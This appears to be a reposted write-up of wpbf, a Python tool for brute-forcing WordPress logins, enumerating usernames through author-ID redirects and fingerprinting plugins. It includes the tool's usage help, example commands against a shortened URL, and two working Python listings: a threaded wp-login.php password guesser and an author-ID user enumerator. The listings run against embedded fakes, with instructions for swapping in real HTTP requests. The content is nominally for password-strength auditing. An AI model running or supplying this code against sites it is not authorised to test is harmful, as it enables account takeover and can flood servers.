wpbf - WordPress Brute Force Tool
wpbf is a Python-based bruteforce tool for remotely testing password strength, username enumeration and plugin detection on a WordPress site.
How It Works
The script tries to log in to the WordPress dashboard through the login form (wp-login.php by default), combining enumerated usernames with a wordlist and with keywords taken from the blog's own content. If a single username is given with -u, the script does not search for additional usernames.
When a correct username/password pair is found, it is logged and printed on standard output.
For faster results you can spawn several threads, but BE CAREFUL not to flood or DoS the site: every attempt is a full login request. Default settings can be changed in the "config.py" and "logging.conf" files.
The wordlist must have one entry per line. A small wordlist (wordlist.txt) and plugin list (plugins.txt) are provided for testing purposes.
Note: it requires Python 2.6+.
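As an added illustration of the login loop described above (example code written for this page, not wpbf's own source), the following Python 3 builds the candidate list from a wordlist plus keywords scraped from blog content, posts the same form fields wp-login.php expects, and runs the attempts on a small thread pool that stops at the first hit, i.e. the behaviour behind the -nk, -t and -ds switches. The target is a fake wp-login.php embedded in the script; the account, the blog content and the host name are assumptions. To run it against a site you are authorised to test, replace fake_post with a wrapper around requests.Session().post(url, data=form, allow_redirects=False) that returns the status code, headers and body.

```python
import re
import threading
from concurrent.futures import ThreadPoolExecutor

# Constructed stand-in for the target's wp-login.php (no network). Real WordPress
# answers a wrong password with HTTP 200 and <div id="login_error">, and a correct
# one with a 302 to wp-admin/ plus a wordpress_logged_in_* cookie. The account is an
# assumption for the demo.
FAKE_ACCOUNTS = {"john": "greenhouse"}

# Constructed blog content; a real run would fetch the front page and a few posts.
SAMPLE_HTML = ("<h1>Notes from the Greenhouse</h1>"
               "<p>John writes about tomatoes and Boston weather.</p>")


def fake_post(url, form):
    """Mimic wp-login.php: returns (status, headers, body)."""
    if FAKE_ACCOUNTS.get(form["log"]) == form["pwd"]:
        return 302, {"Location": "/wp-admin/",
                     "Set-Cookie": "wordpress_logged_in_0123abcd=john%7C...; path=/"}, ""
    return 200, {}, '<div id="login_error"><strong>ERROR</strong>: ...</div>'


def keywords_from_content(html, min_len=6):
    """Pull distinct words out of page content to seed the wordlist (the -nk idea, on by default)."""
    text = re.sub(r"<[^>]+>", " ", html)
    seen, words = set(), []
    for w in re.findall(r"[A-Za-z][A-Za-z0-9]+", text):
        if len(w) >= min_len and w.lower() not in seen:
            seen.add(w.lower())
            words.append(w)
    return words


def build_candidates(wordlist, content_html, use_keywords=True):
    """Wordlist entries first, then each content keyword as written and lower-cased, deduplicated."""
    extra = []
    if use_keywords:
        for w in keywords_from_content(content_html):
            extra += [w, w.lower()]
    cands = []
    for p in list(wordlist) + extra:
        if p not in cands:
            cands.append(p)
    return cands


def login_ok(post, base_url, user, pwd):
    """One login attempt; success only if WordPress redirects and sets the logged-in cookie."""
    base = base_url.rstrip("/")
    status, headers, _ = post(base + "/wp-login.php", {
        "log": user, "pwd": pwd, "wp-submit": "Log In",
        "redirect_to": base + "/wp-admin/", "testcookie": "1"})
    return status == 302 and "wordpress_logged_in_" in headers.get("Set-Cookie", "")


def brute_force(post, base_url, users, candidates, threads=5, stop_on_hit=True):
    """Try every (user, password) pair on a thread pool; stop at the first hit unless stop_on_hit is False."""
    found, lock, stop = [], threading.Lock(), threading.Event()

    def attempt(pair):
        if stop.is_set():          # -ds not given: pending tasks become no-ops after a hit
            return
        user, pwd = pair
        if login_ok(post, base_url, user, pwd):
            with lock:
                found.append((user, pwd))
            if stop_on_hit:
                stop.set()

    pairs = [(u, p) for u in users for p in candidates]
    with ThreadPoolExecutor(max_workers=threads) as pool:
        list(pool.map(attempt, pairs))
    return found


if __name__ == "__main__":
    cands = build_candidates(["password", "123456", "admin"], SAMPLE_HTML)
    print(brute_force(fake_post, "http://blog.example", ["john"], cands))
```

Against a real site the POST must also carry the wordpress_test_cookie cookie that a GET of wp-login.php sets; without it WordPress answers even a correct password with a "cookies are blocked" error, which the check above would count as a miss. Keep the thread count low: each attempt is one login request, and a lockout plugin will trip long before a wordlist is exhausted.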
Features:
- Username enumeration and detection (TALSOFT-2011-0526 author ID redirect, the author's archive page, and content parsing)
- Threads
- Use keywords from the blog's content in the wordlist
- HTTP proxy support
- Basic WordPress fingerprinting (version and full path)
- Advanced plugin fingerprinting (bruteforce, discovery and version/documentation)
- Detection of the Login LockDown plugin (it blocks the source IP after a few failed attempts, which makes the bruteforce useless)
- Advanced logging using Python's logging library and a logging configuration file
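The author-ID walk behind the first feature and the -eut / -mu switches, as an added example that is not part of wpbf: WordPress answers /?author=N with a redirect to /author/<nicename>/ when user N exists, so walking N upward and reading the Location header yields the user slugs. The tolerance is the number of consecutive unused IDs allowed before the walk stops, because deleted accounts leave gaps. The fake front end, its users and the gaps at IDs 3-4 and 6-8 are constructed for the demo; for a real target replace fake_get with a wrapper around requests.get(url, allow_redirects=False).

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed fake of a WordPress front end (no network): /?author=N answers 301 to
# /author/<nicename>/ for an existing user ID and 404 otherwise. The user IDs, the
# gaps and the names are assumptions for this demo.
FAKE_AUTHORS = {1: "admin", 2: "john", 5: "editor-kate", 9: "guest"}


def fake_get(url):
    """Mimic WordPress's author-ID canonical redirect: returns (status, headers, body)."""
    qs = parse_qs(urlsplit(url).query)
    uid = int(qs.get("author", ["0"])[0])
    if uid in FAKE_AUTHORS:
        return 301, {"Location": f"/author/{FAKE_AUTHORS[uid]}/"}, ""
    return 404, {}, "<title>Page not found</title>"


# Matches both relative and absolute Location values.
AUTHOR_SLUG = re.compile(r"/author/([^/?#]+)")


def enumerate_users(get, base_url, tolerance=3, max_users=None, max_id=10000):
    """Walk author IDs upward; stop after `tolerance` consecutive IDs with no author redirect,
    after `max_users` hits (-mu), or at a hard ceiling so a misbehaving site cannot loop forever."""
    users, misses, uid = {}, 0, 1
    while misses < tolerance and uid <= max_id:
        if max_users is not None and len(users) >= max_users:
            break
        status, headers, _ = get(f"{base_url.rstrip('/')}/?author={uid}")
        m = AUTHOR_SLUG.search(headers.get("Location", "")) if status in (301, 302) else None
        if m:
            users[uid] = m.group(1)
            misses = 0          # a hit resets the gap counter
        else:
            misses += 1
        uid += 1
    return users


if __name__ == "__main__":
    print(enumerate_users(fake_get, "http://blog.example"))            # tolerance 3 misses ID 9
    print(enumerate_users(fake_get, "http://blog.example", tolerance=4))
```

Two caveats a practitioner should keep in mind. The slug in the redirect is the user's nicename, which is usually the login name but need not be (the fake "editor-kate" stands for that case), which is why the tool also parses page content for display names. And the redirect only exists when pretty permalinks are enabled and nothing in front of WordPress blocks it; a 404 for every ID means this method found nothing, not that the site has no users.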
Usage:
wpbf.py [-h] [-w WORDLIST] [-u USERNAME] [-s SCRIPTPATH] [-t THREADS] [-p PROXY]
        [-nk] [-eu] url
wpbf will audit and bruteforce your WordPress installation to test password
strength, server configuration, users and installed plugins. It currently
supports threads and an HTTP proxy and provides a very small default wordlist (a
dynamic wordlist is generated by default from the blog's content) and basic
username detection.
positional arguments:
  url                   base URL where WordPress is installed
optional arguments:
  -h, --help            show this help message and exit
  -w WORDLIST, --wordlist WORDLIST
                        wordlist file (default: wordlist.txt)
  -nk, --nokeywords     don't search for keywords in the content and add them to the wordlist
  -u USERNAME, --username USERNAME
                        username (default: None)
  -s SCRIPTPATH, --scriptpath SCRIPTPATH
                        path to the login form (default: wp-login.php)
  -t THREADS, --threads THREADS
                        how many threads the script will spawn (default: 5)
  -p PROXY, --proxy PROXY
                        HTTP proxy (ex: http://localhost:8008/)
  -nf, --nofingerprint  don't fingerprint WordPress
  -eu, --enumerateusers
                        only enumerate users (without bruteforcing)
  -mu MAXUSERS, --maxusers MAXUSERS
                        maximum number of usernames to enumerate (default: no limit)
  -eut ENUMERATETOLERANCE, --enumeratetolerance ENUMERATETOLERANCE
                        user ID gap tolerance to use in username enumeration (default: 3)
  -nps, --nopluginscan  skip plugin bruteforce, enumeration and fingerprinting
  -ds, --dontstop       don't stop when a password is found; continue with all pending tasks
  --test                run Python doctests (you can use a dummy URL here)
Examples:
- Basic
It will use the default settings (you can change the default settings in config.py file):
$ ./wpbf.py http://ift.tt/1ltkwWC
- Custom
$ ./wpbf.py --nokeywords -u john -p http://localhost:8008/ http://ift.tt/1ltkwWC
- Aggressive
$ ./wpbf.py -t 23 http://ift.tt/1ltkwWC
- Username enumeration
$ ./wpbf.py -eu http://ift.tt/1ltkwWC
from Effect Hacking full article here